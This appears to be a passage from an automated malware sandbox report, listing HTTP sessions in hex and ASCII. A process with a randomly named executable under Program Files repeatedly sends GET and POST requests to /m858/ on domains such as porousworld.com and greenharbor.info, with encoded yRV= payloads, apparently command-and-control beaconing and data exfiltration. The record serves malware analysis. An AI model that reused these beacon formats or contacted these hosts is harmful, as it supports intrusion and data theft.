                                                                                                                      Data Ascii: yRV=8Qr8FP/9SVmDBLQE7Qt7o4VOS+Z+bvK+3zjK0Fw0bfqxITimuRuI89FCyNnRLNUUs0kVvN34tsbkqFPBx37tAlz6DPgWNLr9ZDF6kLe6t971EBKGOcxGv/MyQ0wZ6FNKjfzwejwPYdnJ2CnmRHN2DJrAbbG0V3ufu3BKAS/ZnCMQW2+dE7k8D7f2j3QTNppVRZIPr7+MNH3jOGXuZ6uhuci7qsVZiyQIWO2rPCsFi0PqBQe4RtiQ6ouF/S9+Escgk7QeZxoLKN368G3mwBNN0XU2m9NeShiv17myvtTDteDSaSoamBF+SDmnVpckBR5hnJNE2QJY3lv+/xk0G79cX+WXLdbWidTevhxzKoXOgsV0SbtX0fxxFhX2azlPXGp4765NC4X8tb1Aa8D83fvMI0MwcBctgKyF42gVlYrpW8no2V8OB56V2HMLCvzf6Z166ue4+L+qL3icz68c63TeuziU3JuPzA323uxSfvgwn88rz9TCAdBy9m6ATtJWl6UVK9y/2LDeCNAtQzlQOGmO0f3MwFT73aZCuJvz305TWgCMUWB4RXX55Hl/FovueDT+3aHeFhgAAuGyEFLMDwX1HGZXWT4jm4VpLQaX/jKzQraKbVEPHN2U9icax/xHa5hZYEmUbgie2Bhj9qyBzE4TTLWtF0wlBz3Nwiu1sSGJcpOH8mzfJG4Z5PYnM/vzdMnHkN8jV9mFO2vubHkD9Eg2hyL9CBZIb24t8vICSsvRr6F0bF2hC3JUBFc24GixIYHJaD5YaL711snAOpwG59zNtep6D6SfMOrfkoKdpYVSQ8ylGn9qyN2jOK/Z09uB+8xcgFDM/lBpC0B1c1Dw6ZGeSJ6pNtwiYlTv+uXQJV9TU/k+GmQeXTkA5U5nweMk276gpN5P0xQ8fWwaG/YNZTFObi+1LcBqEY/Ux3HiUR3VeXet5lMnu7hfYJDcHW+mXsdL7QYNqIlXR/G2caHqNEx0G6eC7wzzsJntFx2ptHBW+Yd6shzXutLRZM7HH+A8xXu38XN/7fF69mEED8x/WDZTIA5lcKs/o5pHrkOjUXBcCAJgmkZOo/KRYZh2Ae7u8bDQlOI4pNwdv/EX9dXHUqq4QFD34E3rQDBluv72FhP8Shjl+WN90I+0patgAjikANRLKkWl0QFPBkQjqBQZrP5G+dNCrhK73Esw0dmHHbikjj0IECtHbLT37B//8bfN
                                                                                                                      Dec 7, 2023 15:53:27.113048077 CET418INHTTP/1.1 404 Not Found
                                                                                                                      Date: Thu, 07 Dec 2023 14:53:25 GMT
                                                                                                                      Server: Apache
                                                                                                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                      Link: <https://porousworld.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                      Upgrade: h2,h2c
                                                                                                                      Connection: Upgrade, close
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Data Raw: 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 0d 0a
                                                                                                                      Data Ascii: 3b<!DOCTYPE html><html lang="en-US"><head><meta charset="
                                                                                                                      Dec 7, 2023 15:53:27.113070011 CET93INData Raw: 62 0d 0a 55 54 46 2d 38 22 20 2f 3e 0a 09 0d 0a 34 37 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61
                                                                                                                      Data Ascii: bUTF-8" />47<meta name="viewport" content="width=device-width, initial-scale=1" />
                                                                                                                      Dec 7, 2023 15:53:27.124141932 CET63INData Raw: 33 39 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 0d 0a
                                                                                                                      Data Ascii: 39<meta name='robots' content='max-image-preview:large' />
                                                                                                                      Dec 7, 2023 15:53:27.125122070 CET57INData Raw: 33 33 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 50 6f 72 6f 75 73 20 57 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 0d 0a
                                                                                                                      Data Ascii: 33<title>Page not found &#8211; Porous World</title>
                                                                                                                      Dec 7, 2023 15:53:27.125137091 CET59INData Raw: 33 35 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 70 6f 72 6f 75 73 77 6f 72 6c 64 2e 63 6f 6d 27 20 2f 3e 0a 0d 0a
                                                                                                                      Data Ascii: 35<link rel='dns-prefetch' href='//porousworld.com' />
                                                                                                                      Dec 7, 2023 15:53:27.125150919 CET129INData Raw: 37 62 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 50 6f 72 6f 75 73 20 57 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46
                                                                                                                      Data Ascii: 7b<link rel="alternate" type="application/rss+xml" title="Porous World &raquo; Feed" href="https://porousworld.com/feed/" />
                                                                                                                      Dec 7, 2023 15:53:27.125277996 CET147INData Raw: 38 64 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 50 6f 72 6f 75 73 20 57 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43
                                                                                                                      Data Ascii: 8d<link rel="alternate" type="application/rss+xml" title="Porous World &raquo; Comments Feed" href="https://porousworld.com/comments/feed/" />
                                                                                                                      Dec 7, 2023 15:53:27.125458956 CET1286INData Raw: 63 65 38 0d 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72
                                                                                                                      Data Ascii: ce8<script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/porous
                                                                                                                      Dec 7, 2023 15:53:27.125473022 CET1286INData Raw: 2c 22 5c 75 64 38 33 65 5c 75 64 65 66 31 5c 75 64 38 33 63 5c 75 64 66 66 62 5c 75 32 30 30 64 5c 75 64 38 33 65 5c 75 64 65 66 32 5c 75 64 38 33 63 5c 75 64 66 66 66 22 2c 22 5c 75 64 38 33 65 5c 75 64 65 66 31 5c 75 64 38 33 63 5c 75 64 66 66
                                                                                                                      Data Ascii: ,"\ud83e\udef1\ud83c\udffb\u200d\ud83e\udef2\ud83c\udfff","\ud83e\udef1\ud83c\udffb\u200b\ud83e\udef2\ud83c\udfff")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(3
                                                                                                                      Dec 7, 2023 15:53:27.125619888 CET739INData Raw: 72 65 61 74 65 4f 62 6a 65 63 74 55 52 4c 28 72 29 2c 7b 6e 61 6d 65 3a 22 77 70 54 65 73 74 45 6d 6f 6a 69 53 75 70 70 6f 72 74 73 22 7d 29 3b 72 65 74 75 72 6e 20 76 6f 69 64 28 61 2e 6f 6e 6d 65 73 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65
                                                                                                                      Data Ascii: reateObjectURL(r),{name:"wpTestEmojiSupports"});return void(a.onmessage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      8192.168.2.1149719173.231.241.132802016C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 7, 2023 15:53:27.617475033 CET442OUTGET /m858/?GJ=C4IdWhJXSFOXR8D&yRV=xSDcG6j+Ey2rPqhzwDdzjJVnVNgkT4rk7B/VgGxpF9KJHhiy72u20ZI8z6z+NNUSjVU02PDtrOX7gmvolmuvPl/watolDMLePw== HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Host: www.porousworld.com
                                                                                                                      Connection: close
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Dec 7, 2023 15:53:29.804791927 CET483INHTTP/1.1 301 Moved Permanently
                                                                                                                      Date: Thu, 07 Dec 2023 14:53:27 GMT
                                                                                                                      Server: Apache
                                                                                                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                      X-Redirect-By: WordPress
                                                                                                                      Upgrade: h2,h2c
                                                                                                                      Connection: Upgrade, close
                                                                                                                      Location: http://porousworld.com/m858/?GJ=C4IdWhJXSFOXR8D&yRV=xSDcG6j+Ey2rPqhzwDdzjJVnVNgkT4rk7B/VgGxpF9KJHhiy72u20ZI8z6z+NNUSjVU02PDtrOX7gmvolmuvPl/watolDMLePw==
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Dec 7, 2023 15:53:29.884135962 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                      Data Ascii: 0


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      9192.168.2.114972069.57.161.215802016C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 7, 2023 15:53:35.496639013 CET716OUTPOST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.greenharbor.info
                                                                                                                      Origin: http://www.greenharbor.info
                                                                                                                      Referer: http://www.greenharbor.info/m858/
                                                                                                                      Content-Length: 184
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Data Raw: 79 52 56 3d 6f 31 6e 42 54 38 51 35 44 75 76 62 59 77 6d 75 71 49 69 50 52 30 63 5a 4c 69 70 46 4d 77 6b 52 52 38 43 70 57 6a 6e 33 6a 66 79 67 39 44 43 50 63 46 2f 6d 7a 37 76 5a 36 62 33 2f 57 65 71 41 39 2f 78 4e 49 77 71 6d 4f 2b 69 52 55 39 5a 52 62 37 54 72 34 53 33 6f 55 6e 56 63 35 74 73 55 7a 6c 52 6b 68 65 42 33 55 69 62 34 7a 35 45 76 66 36 53 4f 63 75 33 54 50 62 2f 37 36 48 32 42 4d 48 36 71 61 67 55 58 69 68 2f 79 48 6f 79 63 35 72 65 6d 50 79 76 46 34 48 76 53 57 55 51 4d 78 63 44 79 34 4f 4a 63 74 5a 71 73 79 46 4b 46 5a 51 3d 3d
                                                                                                                      Data Ascii: yRV=o1nBT8Q5DuvbYwmuqIiPR0cZLipFMwkRR8CpWjn3jfyg9DCPcF/mz7vZ6b3/WeqA9/xNIwqmO+iRU9ZRb7Tr4S3oUnVc5tsUzlRkheB3Uib4z5Evf6SOcu3TPb/76H2BMH6qagUXih/yHoyc5remPyvF4HvSWUQMxcDy4OJctZqsyFKFZQ==
                                                                                                                      Dec 7, 2023 15:53:35.790929079 CET533INHTTP/1.1 404 Not Found
                                                                                                                      Date: Thu, 07 Dec 2023 14:53:35 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 389
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html
                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      10192.168.2.114972169.57.161.215802016C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 7, 2023 15:53:38.226535082 CET736OUTPOST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.greenharbor.info
                                                                                                                      Origin: http://www.greenharbor.info
                                                                                                                      Referer: http://www.greenharbor.info/m858/
                                                                                                                      Content-Length: 204
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Data Raw: 79 52 56 3d 6f 31 6e 42 54 38 51 35 44 75 76 62 5a 51 32 75 70 76 4f 50 58 55 63 61 53 53 70 46 5a 67 6c 61 52 38 2b 70 57 69 54 6e 67 74 57 67 39 69 79 50 54 67 54 6d 77 37 76 5a 31 37 33 2b 49 75 71 4c 39 2f 4e 72 49 78 57 6d 4f 2b 32 52 55 38 70 52 62 4e 62 71 33 69 33 71 42 33 56 65 6d 39 73 55 7a 6c 52 6b 68 65 55 67 55 69 44 34 7a 49 55 76 66 65 47 4e 41 65 33 51 5a 72 2f 37 2b 48 32 46 4d 48 36 49 61 6b 55 39 69 6a 48 79 48 70 43 63 36 2b 71 35 42 43 76 44 32 6e 75 51 64 6d 31 38 38 36 71 6d 6f 4e 35 39 6c 63 7a 2f 33 51 6d 57 65 75 38 4f 45 31 54 34 58 79 43 78 61 6d 46 36 45 78 62 30 62 68 41 3d
                                                                                                                      Data Ascii: yRV=o1nBT8Q5DuvbZQ2upvOPXUcaSSpFZglaR8+pWiTngtWg9iyPTgTmw7vZ173+IuqL9/NrIxWmO+2RU8pRbNbq3i3qB3Vem9sUzlRkheUgUiD4zIUvfeGNAe3QZr/7+H2FMH6IakU9ijHyHpCc6+q5BCvD2nuQdm1886qmoN59lcz/3QmWeu8OE1T4XyCxamF6Exb0bhA=
                                                                                                                      Dec 7, 2023 15:53:38.520930052 CET533INHTTP/1.1 404 Not Found
                                                                                                                      Date: Thu, 07 Dec 2023 14:53:38 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 389
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html
                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      11192.168.2.114972269.57.161.215802016C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 7, 2023 15:53:40.965720892 CET1749OUTPOST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.greenharbor.info
                                                                                                                      Origin: http://www.greenharbor.info
                                                                                                                      Referer: http://www.greenharbor.info/m858/
                                                                                                                      Content-Length: 1216
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Data Raw: 79 52 56 3d 6f 31 6e 42 54 38 51 35 44 75 76 62 5a 51 32 75 70 76 4f 50 58 55 63 61 53 53 70 46 5a 67 6c 61 52 38 2b 70 57 69 54 6e 67 74 65 67 39 51 36 50 53 48 6e 6d 78 37 76 5a 38 62 33 37 49 75 71 57 39 37 5a 76 49 78 61 59 4f 38 4f 52 56 65 4e 52 5a 2f 7a 71 73 53 33 71 5a 48 56 64 35 74 74 65 7a 6c 68 6f 68 65 45 67 55 69 44 34 7a 4c 63 76 57 71 53 4e 43 65 33 54 50 62 2f 33 36 48 32 39 4d 47 53 79 61 6b 41 48 69 53 6e 79 48 4a 53 63 32 6f 47 35 44 69 76 42 31 6e 75 79 64 6d 4a 6a 38 37 43 71 6f 4e 39 45 6c 63 62 2f 30 78 50 78 45 73 73 57 61 58 4c 49 46 6b 2b 72 61 32 51 2f 56 41 47 31 48 30 43 42 69 69 72 72 53 76 64 47 74 37 4e 69 62 36 33 4f 4b 63 71 6c 70 73 38 50 30 7a 4a 65 36 55 68 33 52 5a 70 30 72 36 6a 4c 73 70 68 73 79 36 71 58 58 61 6b 7a 6d 62 4a 56 79 56 51 45 75 55 48 61 70 75 6e 6c 32 36 52 45 74 4b 42 35 4a 4b 49 77 4f 38 2f 70 41 31 68 66 54 65 54 59 71 4f 67 59 55 63 37 46 4c 6c 48 79 2b 35 35 71 6c 79 46 6d 43 31 34 41 79 6a 43 66 71 41 54 69 53 78 6e 65 46 62 30 2b 55 33 71 44 50 74 65 38 67 48 51 6e 79 31 72 38 39 50 30 47 73 35 2b 35 31 6f 30 6b 4e 68 57 78 4f 79 71 67 75 47 58 57 4b 53 30 38 37 46 76 47 69 45 4c 4d 38 52 79 6a 77 6f 4d 53 50 43 61 42 47 61 69 4c 6f 65 61 78 2f 75 6c 72 75 4e 62 54 69 70 41 72 77 37 49 64 6a 6f 6a 56 42 6f 64 6d 4a 44 6d 5a 63 4b 5a 39 6b 5a 79 61 76 63 41 34 4e 38 75 57 37 33 78 37 61 65 4a 52 74 30 78 73 72 49 4f 2b 69 68 48 35 49 72 78 6e 55 6d 64 45 43 6b 4e 37 44 6d 50 30 6e 68 58 68 2f 47 41 74 45 53 4d 50 2f 49 69 57 7a 54 32 58 32 4c 65 53 48 39 56 6b 57 75 36 55 36 6b 36 49 34 4f 76 65 65 7a 36 39 44 61 74 76 72 39 69 68 71 4f 70 44 44 64 57 54 4e 54 6a 46 69 54 62 35 64 44 43 58 72 72 7a 6a 32 49 41 33 72 43 39 61 66 58 6b 71 62 55 6b 44 48 77 31 38 57 76 32 77 52 76 31 4f 4b 61 79 36 66 36 66 75 4b 70 48 34 49 4d 65 72 67 74 62 73 73 58 70 37 69 72 4a 39 43 43 46 4b 50 79 6f 37 73 57 73 6e 39 4b 70 37 67 46 79 69 62 48 6e 64 47 67 4b 77 66 67 75 30 33 73 63 4a 6a 75 49 74 47 79 41 55 62 76 49 39 47 53 6c 78 4e 64 36 4b 47 6e 6f 74 39 31 7a 59 4f 39 50 39 70 66 53 6c 58 54 7a 72 50 54 68 42 2b 78 47 6b 56 42 38 79 65 50 6a 66 6c 30 4e 62 4a 65 6d 36 56 50 4b 46 5a 35 67 4a 45 30 4a 56 64 6c 47 5a 49 51 79 41 47 32 34 53 76 31 5a 4a 6c 46 4e 6a 76 37 5a 61 6c 37 68 61 67 4e 2f 30 49 6e 7a 7a 73 76 61 41 46 75 36 79 72 36 67 37 71 32 53 61 72 70 45 44 4f 69 62 31 2f 4b 67 4c 43 52 4e 4d 79 4e 77 73 72 52 69 73 57 72 69 47 6e 51 2b 74 47 74 36 58 48 4e 4d 74 4a 4b 37 76 35 47 58 46 4a 2f 30 78 38 6e 6f 31 7a 46 56 67 72 6a 37 66 6f 4b 6c 7a 58 57 32 58 53 61 2f 64 67 41 46 78 65 44 7a 6d 6b 50 39 76 71 55 79 42 51 52 49 68 4f 33 55 39 61 59 63 43 54 65 45 69 73 75 6a 48 73 7a 56 66 78 57 52 77 78 6b 4c 69 73 68 42 4f 66 42 4e 79 38 67 34 66 59 6c 63 49 31 43 4d 45 63 36 47 72 5a 52 51 72 55 4f 55 35 76 6f 58 39 57 61 37 45 76 76 77 79 74 52 33 39 63 41 72 6c 78 79 6c 53 55 37 4c 46 57 53 73 7a 47 48 32 38 76 7a 4d 4e 42 4f 46 51 69 4e 2f 37 6c 74 42 41 5a 56 58 42 6b 70 47 71 34 43 38 47 38 53 35 55 65 52 67 45 51 30 43 6b 52 6b 63 47 65 30 6b 54 4c 67 55 62 48 59 49 68 2b 42 55 6c 30 4c 67 62 6e 56 4b 71 69 6e 43 6f 41 4d 62 65 57 6a 6d 43 2f 64 59 47 30 49 64 6d 63 73 4c 73 73 37 30 70 56 65 4a 50 53 35 65 57 41 4e 62 4a 68 69 2b 6b 4c 63 4c 64 50 31 65 6e 46 36 2b 68 6c 76 4d 51 61 2f 75 75 71 47 74 65 4f 79 52 4d 44 6a 4b 75 46 65 68 62 67 6e 79 58 54 71 58 76 4c 56 63 64 6a 77 50 6c 51 43 61 54 49 52 41 6d 6e 77 67 44 35 48 77 4e 76 6d 2f 50 69 45 4d 35 73 73 38 68 76 62 71 69 48 45 53 71 39 37 66 6a 4f 6f 44 56 66 71 6d 33 46 73 6e 67 72 31 30 2b 7a 71 6c 50 74 38 58 4d 48 5a 59 34 64 32 30 49 61 4a 44 58
                                                                                                                      Data Ascii: yRV=o1nBT8Q5DuvbZQ2upvOPXUcaSSpFZglaR8+pWiTngteg9Q6PSHnmx7vZ8b37IuqW97ZvIxaYO8ORVeNRZ/zqsS3qZHVd5ttezlhoheEgUiD4zLcvWqSNCe3TPb/36H29MGSyakAHiSnyHJSc2oG5DivB1nuydmJj87CqoN9Elcb/0xPxEssWaXLIFk+ra2Q/VAG1H0CBiirrSvdGt7Nib63OKcqlps8P0zJe6Uh3RZp0r6jLsphsy6qXXakzmbJVyVQEuUHapunl26REtKB5JKIwO8/pA1hfTeTYqOgYUc7FLlHy+55qlyFmC14AyjCfqATiSxneFb0+U3qDPte8gHQny1r89P0Gs5+51o0kNhWxOyqguGXWKS087FvGiELM8RyjwoMSPCaBGaiLoeax/ulruNbTipArw7IdjojVBodmJDmZcKZ9kZyavcA4N8uW73x7aeJRt0xsrIO+ihH5IrxnUmdECkN7DmP0nhXh/GAtESMP/IiWzT2X2LeSH9VkWu6U6k6I4Oveez69Datvr9ihqOpDDdWTNTjFiTb5dDCXrrzj2IA3rC9afXkqbUkDHw18Wv2wRv1OKay6f6fuKpH4IMergtbssXp7irJ9CCFKPyo7sWsn9Kp7gFyibHndGgKwfgu03scJjuItGyAUbvI9GSlxNd6KGnot91zYO9P9pfSlXTzrPThB+xGkVB8yePjfl0NbJem6VPKFZ5gJE0JVdlGZIQyAG24Sv1ZJlFNjv7Zal7hagN/0InzzsvaAFu6yr6g7q2SarpEDOib1/KgLCRNMyNwsrRisWriGnQ+tGt6XHNMtJK7v5GXFJ/0x8no1zFVgrj7foKlzXW2XSa/dgAFxeDzmkP9vqUyBQRIhO3U9aYcCTeEisujHszVfxWRwxkLishBOfBNy8g4fYlcI1CMEc6GrZRQrUOU5voX9Wa7EvvwytR39cArlxylSU7LFWSszGH28vzMNBOFQiN/7ltBAZVXBkpGq4C8G8S5UeRgEQ0CkRkcGe0kTLgUbHYIh+BUl0LgbnVKqinCoAMbeWjmC/dYG0IdmcsLss70pVeJPS5eWANbJhi+kLcLdP1enF6+hlvMQa/uuqGteOyRMDjKuFehbgnyXTqXvLVcdjwPlQCaTIRAmnwgD5HwNvm/PiEM5ss8hvbqiHESq97fjOoDVfqm3Fsngr10+zqlPt8XMHZY4d20IaJDX
                                                                                                                      Dec 7, 2023 15:53:41.255520105 CET533INHTTP/1.1 404 Not Found
                                                                                                                      Date: Thu, 07 Dec 2023 14:53:41 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 389
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html
